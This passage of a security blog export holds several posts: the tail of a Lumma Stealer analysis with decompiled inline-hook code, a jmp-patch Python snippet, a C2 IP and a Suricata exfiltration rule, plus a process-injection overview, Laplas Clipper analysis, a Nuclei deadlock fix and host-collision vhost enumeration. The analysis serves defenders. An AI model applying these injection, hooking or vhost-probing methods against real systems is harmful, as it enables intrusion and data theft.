- It invokes sub_401924(a1) to manually map the PE: allocating memory, copying sections, and applying relocations.
- It then calls sub_401B71(), which:
  - locates a critical function inside ntdll (or another base module) by matching its hashed name (the hash stored in dword_58212C);
  - saves the first five bytes of that function into unk_58B020;
  - uses NtProtectVirtualMemory to make the page writable;
  - patches those five bytes with a jmp sub_401693, thereby installing an inline hook.
- Back in sub_401C50, the malware uses the two function pointers v9 and v10, together with the newly installed hook, to register the manually mapped utilman.exe within the system's loading logic, eventually jumping to its entry point via (v4 + EntryPointRVA).
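The five-byte patch that sub_401B71 assembles can be reproduced in a few lines of Python. This is an illustration with made-up addresses; the real values of dword_58B028 (the hooked function) and sub_401693 come from the running sample.

```python
import struct

def make_jmp_rel32(patch_addr: int, hook_addr: int) -> bytes:
    # E9 <rel32>: the displacement is relative to the end of the 5-byte
    # instruction, mirroring v6[0] = (int)sub_401693 - dword_58B028 - 5.
    rel32 = (hook_addr - patch_addr - 5) & 0xFFFFFFFF
    return bytes([0xE9]) + struct.pack("<I", rel32)

# Hypothetical addresses for illustration only.
patch = make_jmp_rel32(0x7C902000, 0x00401693)
assert patch[0] == 0xE9 and len(patch) == 5
```

Disassembling those five bytes at the patched address yields a near jmp to sub_401693, which is exactly what lands at the start of the hooked ntdll function.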
Later, somewhere inside utilman, a call is made to the function that was hooked (dword_58B028). As a result, execution first enters sub_401693, where the malware can:

- perform its own custom logic (e.g., extra processing on loaded modules, or API hijacking), and
- use the five-byte backup stored in unk_58B020, together with (dword_58B028 + 5), to construct a trampoline that returns execution to the original, unmodified function.

Since we previously observed a call to LoadLibraryW(L\u0026quot;winhttp.dll\u0026quot;) inside utilman at address 03CCA273, combining that with the inline-hook mechanism described above, we can conclude that the malware performs an inline hijack of a system API along the entire execution chain:

manually mapping utilman.exe → installing an inline hook on an NTDLL function → jumping into utilman's entry point → utilman internally invoking the hooked NTDLL function → execution first being redirected into the malware's custom logic → and ultimately calling LoadLibraryW(L\u0026quot;winhttp.dll\u0026quot;).

So what exactly did the malware hook?

_DWORD *__stdcall sub_401693(
        int a1, int a2, _DWORD *a3, int a4, int a5,
        int a6, _DWORD *a7, int a8, int a9, int a10)
{
  _DWORD *result; // eax

  result = (_DWORD *)(unsigned __int8)byte_58B025;
  if ( byte_58B025 )
  {
    sub_401410((int)dword_58B028, (int)\u0026amp;unk_58B020, 5u);
    dword_58B028(a1, a2, a3, a4, a5, a6, a7, a8, a9, a10);
    *a7 = -1;
    result = a3;
    *a3 = dword_58B02C;
    byte_58B025 = 0;
  }
  return result;
}

Step-by-step explanation:

1. if ( byte_58B025 ): the hook only executes its logic when byte_58B025 == 1. This flag is set earlier, at 0x401CD8, via the instruction mov byte ptr ds:[58B025], 1.
2. sub_401410((int)dword_58B028, (int)\u0026amp;unk_58B020, 5u);: sub_401410 is just a memcpy. dword_58B028 holds the original entry address of the hooked function, and unk_58B020 contains the five original bytes that were backed up in sub_401B71. In other words, this line restores the first 5 bytes of the original function, ensuring we do not recursively re-enter the hook when the function is called.
3. dword_58B028(a1, a2, a3, ..., a10);: at this point dword_58B028 once again points to the genuine function entry, so this is a real call to the original function.
4. *a7 = -1;: sets the field pointed to by a7 to 0xFFFFFFFF, likely serving as a marker or placeholder.
5. *a3 = dword_58B02C;: overwrites the value pointed to by the third argument with dword_58B02C. The hook uses this opportunity to update a field inside an internal loader structure, effectively replacing the module-base field with the base address of the manually mapped image.
6. byte_58B025 = 0;: finally, the flag is cleared. Even if execution were to reach sub_401693 again (unlikely in practice, since the original 5 bytes were restored), the if (byte_58B025) check would fail and the hook would be completely inert.

In summary, on the first invocation of the hooked NT function, this hook:

- redirects execution via the injected jmp sub_401693;
- restores the original instructions and performs a genuine call to the API once;
- silently overwrites certain output fields in the loader's internal structures with the address of the manually mapped image;
- marks itself as “used” so that it will not interfere with any subsequent calls.

This is a textbook example of a one-shot trampoline hook.

By placing a breakpoint on sub_401693 and observing the call stack when it fires, we can see that the intercepted function is RtlAppendUnicodeStringToString.

Why RtlAppendUnicodeStringToString? When loading any DLL, the Windows loader performs the following sequence of steps:

1. It constructs a UNICODE_STRING structure representing the module path.
2.
It modifies this structure through a series of Rtl*String routines, including:

- RtlInitUnicodeString
- RtlAppendUnicodeStringToString
- RtlEqualUnicodeString
- RtlAnsiStringToUnicodeString
- …

3. It then passes the fully constructed UNICODE_STRING to LdrpLoadDll, which performs the actual file open, memory mapping, and module initialization.

All of these operations occur inside ntdll.dll, at the lowest level of the loader's internal implementation.

Among these routines, RtlAppendUnicodeStringToString is responsible for:

- appending path components
- appending file names
- appending extensions
- constructing the final, fully qualified module name

In practice, nearly every invocation of LdrLoadDll calls RtlAppendUnicodeStringToString as part of this name-construction process.

In other words: the malware exploits this string-append moment inside RtlAppendUnicodeStringToString to inject its “fake” module into the loader's internal structures, causing the loader to treat the manually mapped utilman.exe as if it had been loaded normally by the system.

With this, the analysis of the malware's dynamic-loading technique is essentially complete.

Summary

The sample is a variant of Lumma Stealer, an information-stealing malware family with strong obfuscation and dynamic-loading capabilities. It:

- Uses a ~700 MB overlay and junk code to hinder static analysis.
- Employs anti-debug checks and API hashing to conceal real API names.
- Implements a manual PE mapper to load utilman.exe in memory without the Windows loader.
- Installs a one-shot inline hook on RtlAppendUnicodeStringToString to tamper with loader-internal structures and stealthily register the manually mapped module.
- Leverages utilman to indirectly load winhttp.dll, enabling WinHTTP-based C2 communication.
- Steals data from browsers, FTP clients, Steam, cryptocurrency wallets, AnyDesk, KeePass, and other applications.
- Exfiltrates collected data via plaintext multipart POST requests to 82.118.23.50.
In short, this sample combines manual mapping, inline NTDLL hooking, dynamic module hijacking, and broad credential theft, aligning closely with known Lumma Stealer behavior.

IOC

sha256: eadaa17ba90ac05bec49ce116a4180ba092d120e644109dac5e0d7896f69009b
IP: 82.118.23.50

suricata:

alert http $HOME_NET any -\u0026gt; $EXTERNAL_NET any (msg:\u0026quot;ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2\u0026quot;; flow:established,to_server; http.method; content:\u0026quot;POST\u0026quot;; http.uri; bsize:7; content:\u0026quot;/c2sock\u0026quot;; nocase; http.request_body; content:\u0026quot;Content-Disposition|3a 20|form-data|3b 20|name|3d 22|file|22 3b 20|filename|3d 22|file|22 0d 0a|Content-Type|3a 20|attachment/x-object|0d 0a 0d 0a|PK\u0026quot;; fast_pattern; content:\u0026quot;Content-Disposition|3a 20|form-data|3b 20|name|3d 22|hwid|22 0d 0a 0d 0a 7b|\u0026quot;; pcre:\u0026quot;/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\x7d/R\u0026quot;; content:\u0026quot;Content-Disposition|3a 20|form-data|3b 20|name|3d 22|pid|22|\u0026quot;; content:\u0026quot;Content-Disposition|3a 20|form-data|3b 20|name|3d 22|lid|22|\u0026quot;; reference:md5,9dcde1edfdd83f7cc28dcd31323be326; reference:md5,b3b025b8445dcbd9b7aca560ad752b74; classtype:trojan-activity; sid:2043206; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2023_01_04, deployment Perimeter, malware_family lumma, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_26, reviewed_at 2025_07_14; target:src_ip;)
","permalink":"https://blacksugar.top/posts/lumma_stealer/","summary":"\u003cp\u003eLUMMA offers Malware-as-a-Service (MaaS) for information-stealing trojans,  enabling its customers to directly build trojans on the platform.
The MaaS platform also supports parsing, extracting, and retrieving stolen data such as databases and text files, significantly lowering the barrier to entry for data-theft attacks. The LUMMA technical development team continues to refine the trojan\u0026rsquo;s data-exfiltration capabilities, which currently include stealing browser data, cryptocurrency keys, KeePass password databases, and more. To effectively evade antivirus solutions, LUMMA does not employ VMProtect (VMP) packing technology but instead utilizes a string-obfuscation method referred to by the technical team as the \u0026ldquo;MORPHER\u0026rdquo; solution.\u003c/p\u003e","title":"「君迁」Comprehensive Malware Analysis of a Lumma Stealer Sample Delivered via Malicious SCR Dropper"},{"content":"0x00 Opening I didn\u0026rsquo;t set out to write about process injection. I was knee-deep in a reverse-engineering task when a sample named RustDog kept pulling me back — not because it was flashy, but because it quietly did what many modern trojans do: slip code into other processes and hide in plain sight. Over a few late-night debugging sessions I tracked how it reached into legitimate processes and manipulated them. That little detour turned into a full mini-project: I decided to map out common injection techniques, why many defenses miss them, and how the RustDog example ties everything together.\n0x01 Why This Matters Process injection is one of those techniques that sits at the intersection of elegance and menace. From an attacker\u0026rsquo;s point of view it\u0026rsquo;s elegant because it lets attackers reuse trusted processes (so their code looks \u0026ldquo;normal\u0026rdquo; to casual inspection).
From a defender\u0026rsquo;s point of view it\u0026rsquo;s annoying because the injected code can:

- run inside another process\u0026rsquo;s address space (so file-based scanners may miss it),
- hide its module metadata or erase PE headers (making discovery harder), and
- use legitimate Windows APIs and mechanisms (APCs, remote threads, message hooks, IME mechanisms) to execute without obvious signs.

Because of that, simple heuristics (e.g., \u0026ldquo;scan the PEB for unexpected modules\u0026rdquo;) often get bypassed. In some cases attackers will strip or unlink their modules; in others they\u0026rsquo;ll avoid modules altogether and run raw shellcode in memory. That's why I wanted to step back and write a concise, practical summary — one that mixes intuition, concrete techniques, and the real RustDog case I analyzed.

0x02 Process Injection Mechanism

Setting aside the form of the payload (DLL vs. shellcode), injection techniques can be broadly categorized by mechanism into two types: methods based on cross-process access, and methods based on system mechanisms.

2.1 Injection Methods Based on Cross-Process Access

Trojans in this category typically achieve code injection and modification through module injection. The attack first injects a malicious DLL into the target process; the DLL\u0026rsquo;s entry function executes the malicious code, and the malicious functionality is then implemented through methods such as hooking Windows APIs, setting timers to monitor process state, and creating child threads.

Usually, there are three common approaches:

- Remote Thread Injection: creating a new thread in the target process.
- Thread Hijacking: utilizing an existing thread in the target process.
- APC (Asynchronous Procedure Call) Injection: leveraging the APC feature of threads.
2.1.1 Remote Thread Injection

This method creates a remote thread in the target process and uses that thread to perform the operations needed to load the DLL.

2.1.2 Thread Hijacking

This method first suspends a specific thread within the target process, then modifies that thread's instruction pointer (EIP or RIP) to point at a section of memory the malicious program has allocated inside the target process. A piece of shellcode written into that area then performs the module injection.

2.1.3 APC (Asynchronous Procedure Call) Injection

\u0026ldquo;APC\u0026rdquo; stands for Asynchronous Procedure Call, a thread-based callback mechanism provided by Windows.

APC injection principle:

- When a thread enters an alertable wait in functions like SleepEx, SignalObjectAndWait, WaitForSingleObjectEx, WaitForMultipleObjectsEx, or MsgWaitForMultipleObjectsEx, the system can deliver queued APCs to it.
- When the thread is awakened again, it first executes the functions registered in its APC queue.
- Using the QueueUserAPC() API, a function pointer can be inserted into the thread's APC queue. If we insert a pointer to the LoadLibrary() function, we achieve DLL injection.

2.2 Injection Methods Based on System Mechanisms

These methods exploit special mechanisms of the Windows operating system to achieve injection. Two common methods are:

- Hooking Windows Messages
- Input Method Injection

2.2.1 Hooking Windows Messages

This method uses the SetWindowsHookEx function provided by Windows to register a global message hook for a specific type of message event. When a thread in the system triggers the specified message event, Windows automatically calls the hook function specified during registration.
If this hook function resides in a DLL, Windows first injects that DLL into the process where the message event is triggered, and then calls the hook function.

2.2.2 Input Method Injection

On the Windows platform, when switching input methods, the Input Method Manager imm32.dll loads the Input Method Editor (IME) module. This creates the conditions necessary for input-method injection. An IME file is essentially a special DLL stored in the C:\WINDOWS\system32 directory, and inside it we can call LoadLibrary() to load a DLL of our choosing. When the user switches to the maliciously crafted input method, the injection is executed.

0x03 Process Injection Protection

Based on the preceding analysis of process injection techniques, a defensive approach centered on Windows kernel events is proposed. The system monitors kernel-level events to detect and prevent attempts to modify a target process's memory or to load unauthorized modules, preserving process integrity. In addition, lightweight anti-injection DLLs are injected into system processes to provide an application-layer safeguard. These DLLs use API hooks to monitor mouse- and keyboard-simulation functions and block simulated input from other processes. Together, kernel-event monitoring and system-wide DLL guards create a layered defense against a range of injection techniques.

3.1 Defense Against Cross-Process Access Injection

Cross-process injection typically follows three steps: allocate memory in the target process, write payload data into that memory, and create a thread to execute the payload. Common Windows APIs used for this sequence include VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, all of which require a handle to the target process with appropriate permissions.
Detecting and intercepting illegitimate handle creation and suspicious access patterns prevents the cross-process access chain from completing, thereby blocking this class of module injection.

3.2 Defense Against System Mechanism Injection

Injection methods that exploit Windows system mechanisms do not require acquiring a process handle. To defend against them, module-load events can be monitored at the kernel level to check whether unauthorized modules have been loaded into the target process. Blacklists, whitelists, and signature verification can then be used to validate DLLs.

0x04 Process Injection Case Study

Process injection has become an essential evasion technique for many modern trojans, and traditional antivirus software often struggles to detect them effectively. We recently analyzed a trojan targeting financial personnel, which employed numerous anti-detection measures to bypass antivirus scans. Leveraging the methods described earlier, we were still able to detect it.

4.1 RustDog Phishing Trojan

RustDog is a phishing trojan that targeted finance professionals in the first half of 2023. It operated by sending phishing emails to users, luring them to a fake website where the trojan was downloaded. The trojan's main functionality was to modify the configuration files of SunLogin (a popular remote-control tool widely used in China), enabling remote control through SunLogin and thereby stealing sensitive user information.

Once the trojan is activated, it performs a series of checks and initializations. It attempts to receive payload content sent from the server, then loads and executes it. The executed payload decrypts a DLL file in memory, which is a fully functional remote-control trojan.
If the program is started with a single parameter or includes the string -Puppet, it injects the payload into the notepad.exe or explorer.exe process.\nIn the final step, the Trojan replaces the configuration file of SunLogin, enabling remote control over the user\u0026rsquo;s system. Through reverse analysis of this Trojan, we observed its use of APC injection, which involves illegal handle permissions across processes. Therefore, by monitoring common processes within the system, we can promptly detect such injection behaviors and identify potential attack incidents.\n","permalink":"https://blacksugar.top/posts/process_injection/","summary":"\u003ch2 id=\"0x00-opening\"\u003e0x00 Opening\u003c/h2\u003e\n\u003cp\u003eI didn\u0026rsquo;t set out to write about process injection. I was knee-deep in a reverse-engineering task when a sample named \u003cstrong\u003eRustDog\u003c/strong\u003e kept pulling me back — not because it was flashy, but because it quietly did what many modern trojans do: slip code into other processes and hide in plain sight. Over a few late-night debugging sessions I tracked how it reached into legitimate processes and manipulated them. That little detour turned into a full mini-project: I decided to map out common injection techniques, why many defenses miss them, and how the RustDog example ties everything together.\u003c/p\u003e","title":"「古度」Analysis of RustDog and Process Injection"},{"content":"0x00 What\u0026rsquo;s UP Nuclei is one of my favorite security tools. But recently I ran into a strange and reproducible bug while using ProjectDiscovery’s Nuclei. 
A workflow that normally runs fine suddenly froze forever — but only under a very specific condition.

Before diving into the issue, here's a quick recap of the command we're dealing with:

nuclei -w test-workflow.yaml -u https://example.com -c 1

📝 What this command does

- -w test-workflow.yaml — loads a workflow file that orchestrates multiple templates
- -u https://example.com — specifies the target
- -c 1 — sets concurrency (number of parallel template executions) to 1

Workflows allow Nuclei to chain multiple templates together, making scanning smarter and more automated. However, using -c 1 with workflows used to trigger a curious deadlock, which is exactly what this blog post explores.

All right, now let's go back to the bug:

Nuclei version: v2.9.6

Current behavior: Nuclei gets stuck running certain workflows when concurrency is set to 1, resulting in:

- No output
- No error
- The process never exits

Expected behavior: the workflow completes normally, just as it does when concurrency is set to 2.

0x01 🔍 Root Cause: A Deadlock Inside SizedWaitGroup

After digging into the source code, the issue turns out to be a classic deadlock caused by re-using the same SizedWaitGroup instance in nested workflow steps.

https://github.com/projectdiscovery/nuclei/blob/v2.9.6/v2/pkg/core/workflow_execute.go#L28-L38

swg := sizedwaitgroup.New(w.Options.Options.TemplateThreads)
for _, template := range w.Workflows {
    swg.Add()
    func(template *workflows.WorkflowTemplate) {
        if err := e.runWorkflowStep(template, ctxArgs, results, \u0026amp;swg, w); err != nil {
            gologger.Warning().Msgf(workflowStepExecutionError, template.Template, err)
        }
        swg.Done()
    }(template)
}
swg.Wait()

1.
Outer Workflow Loop Holds the Only Slot

Nuclei creates a SizedWaitGroup based on the concurrency value:

swg := sizedwaitgroup.New(w.Options.Options.TemplateThreads)

So when I run -c 1, the wait-group capacity is literally:

capacity = 1

Inside the main workflow loop, Nuclei calls:

swg.Add()

This occupies the only available slot in the wait group.

2. Inner Workflow Step Also Calls swg.Add()

Later, inside runWorkflowStep(), Nuclei processes subtemplates:

swg.Add()
go func() {
    e.runWorkflowStep(...)
    swg.Done()
}()

But since the outer loop already consumed the only concurrency slot, the inner swg.Add():

- has no remaining capacity,
- blocks forever,
- prevents both goroutines from reaching .Done(),
- and causes a permanent deadlock.

Why it works with -c 2: capacity = 2, so the outer workflow takes one slot → one slot is still free → the inner workflow can Add() safely → no deadlock.

So this is a perfect storm of:

- nested workflows,
- a shared SizedWaitGroup instance, and
- concurrency limit = 1.

0x02 📌 What Makes This Bug Subtle

This bug is easy to miss because:

- It only appears in workflows with nested steps
- It only triggers at concurrency = 1
- Nuclei does not produce errors or logs indicating a deadlock
- It appears random unless concurrency is inspected carefully

In real-world scanning pipelines, especially when limiting concurrency to reduce load, this could cause a workflow to silently hang.

0x03 ✔️ Upstream Resolution

I reported this bug, and the issue was acknowledged by the maintainers and categorized as a workflow-related bug.
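The capacity semantics are easy to model outside of Go. The sketch below is my own illustration, not Nuclei code: it mimics SizedWaitGroup with a BoundedSemaphore, using a timeout to stand in for the forever-blocking Add(). With capacity 1 the nested add fails to get a slot (the deadlock scenario); with capacity 2 it proceeds.

```python
import threading

class SizedWaitGroup:
    """Minimal Python analogue of sizedwaitgroup: add() blocks when full."""
    def __init__(self, capacity: int):
        self._slots = threading.BoundedSemaphore(capacity)

    def add(self, timeout=None) -> bool:
        # In the real Go library Add() blocks with no timeout; the timeout
        # here only exists so the demo can report the would-be deadlock.
        return self._slots.acquire(timeout=timeout)

    def done(self):
        self._slots.release()

def run_workflow(capacity: int) -> bool:
    swg = SizedWaitGroup(capacity)
    swg.add()                   # outer workflow loop takes a slot
    ok = swg.add(timeout=0.1)   # nested workflow step tries to take another
    if ok:
        swg.done()              # nested step finishes
    swg.done()                  # outer step finishes
    return ok

print(run_workflow(1))  # nested add cannot get a slot, like -c 1
print(run_workflow(2))  # nested add succeeds, like the bumped concurrency
```

The same shape explains why the upstream workaround of raising the capacity to 2 is sufficient: only one extra slot is ever needed for the nested step.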
The issue was later scheduled under the v2.9.9 milestone and marked as completed.

To avoid the deadlock that happens when TemplateThreads = 1, the Nuclei team added a simple but effective workaround: automatically bump concurrency from 1 → 2.

Patch code (from workflow_execute.go):

https://github.com/projectdiscovery/nuclei/blob/v2.9.9/v2/pkg/core/workflow_execute.go#L28-L49

templateThreads := w.Options.Options.TemplateThreads
if templateThreads == 1 {
    templateThreads++
}
swg := sizedwaitgroup.New(templateThreads)
for _, template := range w.Workflows {
    swg.Add()
    func(template *workflows.WorkflowTemplate) {
        defer swg.Done()
        if err := e.runWorkflowStep(template, ctxArgs, results, \u0026amp;swg, w); err != nil {
            gologger.Warning().Msgf(workflowStepExecutionError, template.Template, err)
        }
    }(template)
}
swg.Wait()
return results.Load()

Why This Fix Works

The root cause of the deadlock is that, with concurrency = 1, the outer workflow loop consumes the only slot in the SizedWaitGroup; inner workflow steps then attempt to call swg.Add() again, but there is no remaining capacity, so Add() blocks forever and the entire workflow hangs.

By bumping concurrency to 2:

- the outer loop uses slot #1,
- the inner workflow still has slot #2,
- and no deadlock occurs.

","permalink":"https://blacksugar.top/posts/deadlock_in_nuclei/","summary":"\u003ch2 id=\"0x00-whats-up\"\u003e0x00 What\u0026rsquo;s UP\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eNuclei is one of my favorite security tools.\u003c/strong\u003e But recently I ran into a strange and reproducible bug while using \u003cstrong\u003eProjectDiscovery’s Nuclei\u003c/strong\u003e.\nA workflow that normally runs fine suddenly \u003cstrong\u003efroze forever\u003c/strong\u003e—but only under a very specific condition.\u003c/p\u003e\n\u003cp\u003eBefore diving into the issue, here’s a quick recap of the command we’re dealing with:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003enuclei -w test-workflow.yaml -u https://example.com -c
1\n\u003c/code\u003e\u003c/pre\u003e\u003ch3 id=\"-what-this-command-does\"\u003e📝 What this command does\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e-w test-workflow.yaml\u003c/code\u003e — loads a workflow file that orchestrates multiple templates\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e-u https://example.com\u003c/code\u003e — specifies the target\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e-c 1\u003c/code\u003e — sets concurrency (number of parallel template executions) to \u003cstrong\u003e1\u003c/strong\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eWorkflows allow Nuclei to chain multiple templates together, making scanning smarter and more automated. However, using \u003ccode\u003e-c 1\u003c/code\u003e with workflows used to trigger a curious deadlock, which is exactly what this blog post explores.\u003c/p\u003e","title":"「古度」Debugging a Hidden Deadlock in Nuclei Workflows When Concurrency = 1"},{"content":"0x00 Introduction LAPLAS CLIPPER is an information-stealing trojan offered as a subscription-based MaaS (Malware-as-a-Service) cloud service (the service websites are shown below). Users can build trojan binaries directly on the platform and customize callback settings such as proxy servers and persistence configuration item names. The trojan continuously monitors the victim\u0026rsquo;s clipboard, and if the clipboard content matches a wallet-address regular expression it replaces it with the attacker\u0026rsquo;s wallet address, enabling fraudulent transfers and greatly lowering the technical barrier for attacks.\n0x01 Versions of Laplas Clipper Since October 2022, the LAPLAS technical team has released multiple versions of the trojan in .NET, C++, and Go.\nBecause LAPLAS trojans use the callback domain clipper.guru, we searched VirusTotal for samples to analyze.
This article focuses primarily on the .NET and Go variants.

0x02 .NET

Analyzing the sample with the DIE tool, we found no packer or obfuscation; the trojan appears to be an unpacked binary.

Module analysis

Decompilation with dotPeek reveals the main components of the trojan: clipboard manipulation, C2/API communication for data exchange, and startup persistence mechanisms.

The API/C2 request code (see below) is responsible for obtaining wallet addresses, sending the implant's status, and fetching the wallet regex patterns used for scraping/validation.

The clipboard-handling code (below) covers three core actions: read, write, and clear operations on the system clipboard.

Configuration parameters include the command-and-control domain (clipper.guru), the malware's executable name, the Windows startup/persistence registry or scheduled-task name, and the LAPLAS cloud-platform API token.

Persistence and execution flow

At startup, the malware creates a mutex for single-instance enforcement. It then checks for the existence of its persistence mechanism (autostart entry) and, if properly configured, continues running.

The implant queries an API for wallet-address regex patterns and sends heartbeat/online status. It periodically updates the regex set and status, monitors the system clipboard, applies regex-based detection of cryptocurrency addresses, and on a positive match overwrites the clipboard with an attacker-controlled address (address-replacement fraud).

Persistence: the implant sets up a Windows scheduled task using schtasks to achieve autostart.

0x03 Go

DIE analysis of the trojan binary shows it was written in Go and is not packed.

Inspecting the functions in the Go trojan shows they are basically similar to those in the .NET version.

The malware stores its configuration in encrypted form.
On launch, the binary immediately decrypts the configuration blob before continuing; see the code below.

The malware verifies whether its persistence/autostart entry is present.

The malware periodically sends heartbeat/status reports and refreshes the regular expressions used to identify wallet addresses, among other functions.

The malware monitors the system clipboard and, when a clipboard entry matches a wallet-address regex, overwrites it with an attacker-controlled address to facilitate scam transactions.

If its persistence entry is absent, the malware copies itself to the target location and registers a persistence mechanism (autostart).

0x04 Summary

LAPLAS Clipper is a clipboard-hijacking malware family (with variants in .NET, Go, and other languages) that uses the C2 domain clipper.guru. It fetches wallet-address regular expressions from an API and reports heartbeats to it, decrypts an encrypted configuration at startup, and enforces single-instance execution via a mutex. It monitors the clipboard and replaces matched crypto addresses with attacker-controlled addresses to facilitate fraud, and it ensures persistence by copying itself and registering a Windows scheduled task (schtasks). The analyzed Go samples show no packer or obfuscation.

0x05 IOC

sha256

.NET version: 025bec496d71b1d17d023e04f25a5df0f3538308a5d639007a1e7db41c6d91e6
Go version: 04ac8df80dd9829697566bedb82cd689d0c90cffb0c6219a1bfa38dc86dc59c9

","permalink":"https://blacksugar.top/posts/laplas_clipper/","summary":"\u003ch2 id=\"0x00-introduction\"\u003e0x00 Introduction\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eLAPLAS CLIPPER\u003c/strong\u003e, an information-stealing trojan offered as a subscription-based MaaS (Malware-as-a-Service) cloud service (the service websites are shown below). Users can build trojan binaries directly on the platform and customize callback settings such as proxy servers and persistence configuration item names.
The trojan continuously monitors the victim\u0026rsquo;s clipboard, and if the clipboard content matches a wallet-address regular expression it replaces it with the attacker\u0026rsquo;s wallet address, enabling fraudulent transfers and greatly lowering the technical barrier for attacks.\u003c/p\u003e","title":"「松子」LAPLAS CLIPPER: A Brief Analysis of the Trojan"},{"content":" This post is a review of my notes on host collision (virtual host enumeration) – what it is, how it works, and why it still matters nowadays.

It also doubles as a “design doc” for my tool HostCollision.

0x00 Motivation: When ports are open but the site is “missing”

Typical recon story:

- You do IP/port scanning, find lots of 80/443/8080/8443.
- You open them in a browser full of hope.
- You get 403, 404, “Welcome to nginx”, Tomcat default page, random WAF splash screens…

Clearly, something is running there, but not necessarily the app you're after.

In modern environments, this is normal:

- Fronted by load balancers / reverse proxies / CDNs / WAFs.
- Multiple virtual hosts (vhosts) on the same IP.
- Internal or “hidden” apps routed only when the right Host header appears.

This is where host collision comes in: we abuse how HTTP/1.1 routes requests by Host to discover additional sites behind a single IP.

0x01 Quick recap: Host header and virtual hosts

1.1 Host header in HTTP/1.1

In HTTP/1.1, Host is a mandatory header:

GET / HTTP/1.1
Host: example.com

The TCP connection (IP + port) says “which machine did I connect to”; the Host header says “which website on this machine do I want”.

1.2 How web servers use Host

Web servers (Nginx/Apache/etc.) commonly use name-based virtual hosts:

server {
    listen 80;
    server_name www.aaa.com;
    # ...
}
server {
    listen 80;
    server_name www.bbb.com;
    # ...
}
server {
    listen 80 default_server;
    server_name _;   # default / fallback vhost
}

Routing logic is roughly:

- Accept a connection on IP:80.
- Parse the HTTP request → read Host: \u0026lt;something\u0026gt;.
Match server_name / vhost definition. If no match → send traffic to a default vhost (often a boring page). If admins deploy internal apps (e.g. intranet.example.com, admin.example.com) on the same front-end but don’t expose them via public DNS, they may still be reachable as long as the reverse proxy sees the right Host header.\nThat’s the attack surface host collision abuses.\n0x02 So what exactly is “host collision”? 2.1 One-sentence definition Host collision / virtual host fuzzing is sending HTTP requests to a fixed IP while fuzzing the Host header, in order to discover additional vhosts routed through the same front-end.\nConcretely:\nURL: http://\u0026lt;IP\u0026gt;/ Header: Host: \u0026lt;some-domain\u0026gt; Instead of doing “DNS brute force” (ask DNS for foo.example.com, bar.example.com…), you:\nTalk directly to the web server / reverse proxy by IP. Change only the Host header over HTTP. Observe which combinations produce meaningful responses. You maintain two buckets:\nIP bucket: ip.txt Host bucket (domain/subdomain dictionary): host.txt Process:\nfor each ip in ip_list: for each host in host_list: send HTTP request: URL = http://ip/ Host = host record status / length / body fingerprint / similarity If 10.0.0.5 + Host: intranet.example.com suddenly returns a valid app while all other combos return error/default pages, then:\n10.0.0.5 likely fronts the vhost intranet.example.com. This vhost may be “internal-only” from a DNS perspective, but the HTTP gateway still routes to it. 0x03 Normal flow vs. host collision flow 3.1 Normal user flow When a normal user visits https://app.example.com/:\nBrowser resolves app.example.com via DNS. Gets IP, say 1.2.3.4. Connects to 1.2.3.4:443, does TLS handshake (SNI=app.example.com). Sends HTTP request with Host: app.example.com. Load balancer / reverse proxy routes to the correct backend based on SNI / Host. 3.2 What host collision changes Host collision decouples DNS from HTTP routing:\nWe no longer care what DNS says. 
We only need an IP that accepts HTTP/HTTPS. We send Host values that the operator did not intend to expose externally. Example:\nGET / HTTP/1.1 Host: admin.internal.example.com sent directly to 203.0.113.10 (a public IP). If the front-end is misconfigured, it might route this to the internal admin app even though admin.internal.example.com doesn’t resolve in public DNS.\nIn other words:\nDNS says “no such host”. HTTP routing says “sure, come in”.\nThat gap is exactly what we exploit.\n0x04 Why this is a real security issue In many real environments:\nA single IP / load balancer fronts dozens or hundreds of apps. Some apps are meant to be public; some are “internal” or “restricted”. “Internal” is often implemented by: Only putting the hostname in internal DNS. Maybe firewalling some sources, but not always consistently. If all of these apps are still routed based on Host alone, then:\nAnyone who can reach the IP and guess the hostname can hit the app. No public DNS record ≠ no exposure. Certificate enumeration and DNS scraping may miss those hosts. Host collision can reveal a massive number of extra targets in a single IP range. For a pentester, missing this means:\nYou see only one boring site behind an IP. Meanwhile there might be tens or hundreds of APIs, admin panels, debug instances behind the same IP, all accessible with the right Host header. 0x05 A practical workflow: from raw IPs to usable hits 5.1 Collect candidate IPs Typical sources:\nAsset inventory (if you’re internal). External: Shodan, FOFA, Censys, etc. Your own masscan / nmap sweeps. From these, keep IPs where:\n80/443/8080/8443/etc. are open. Direct IP access returns: Default pages (Welcome to nginx, Apache test page, etc.). WAF/403/404. Very generic responses. These are strong candidates for “reverse proxies with multiple vhosts”.\n5.2 Build IP and Host dictionaries ip.txt – one IP per line (filtered candidates). host.txt – hostnames to try, from: Subdomain enumeration (passive + brute-force). 
Wordlists (SecLists, etc.). Historical data, internal naming conventions, leaked configs. 5.3 Run the host collision Tool-agnostic logic:\nFor each (ip, host) pair: URL: http://ip/ Header: Host: host Collect: Status code Response size Response body (for hashing / similarity) Duration (optional, for debugging) This is what tools like ffuf/gobuster/wfuzz do in vhost mode as well.\n5.4 Similarity filtering: kill the noise Raw results are noisy:\nDefault error pages WAF block pages Generic “site not configured” responses Common trick:\nFor each IP, pick a baseline response (often the first valid-looking 2xx/3xx). For every other (ip, host) response: Compute similarity score vs. baseline (e.g. shingle/Jaccard, fuzzy hash…). If similarity is too high, treat it as “same generic page”. If similarity is low, mark it as interesting. This is the core idea behind tools like VhostFinder: virtual hosts with distinct content will diverge from the baseline.\n5.5 Triage and follow-up What you end up with after filtering:\nA relatively small set of (ip, host) combos: 2xx/3xx responses Content significantly different from baseline Titles that look like login pages, admin consoles, dashboards, APIs, etc. Next steps:\nAdd ip → host mappings to /etc/hosts (for convenience). Browse these hosts normally. Combine with directory brute-forcing, tech fingerprinting, 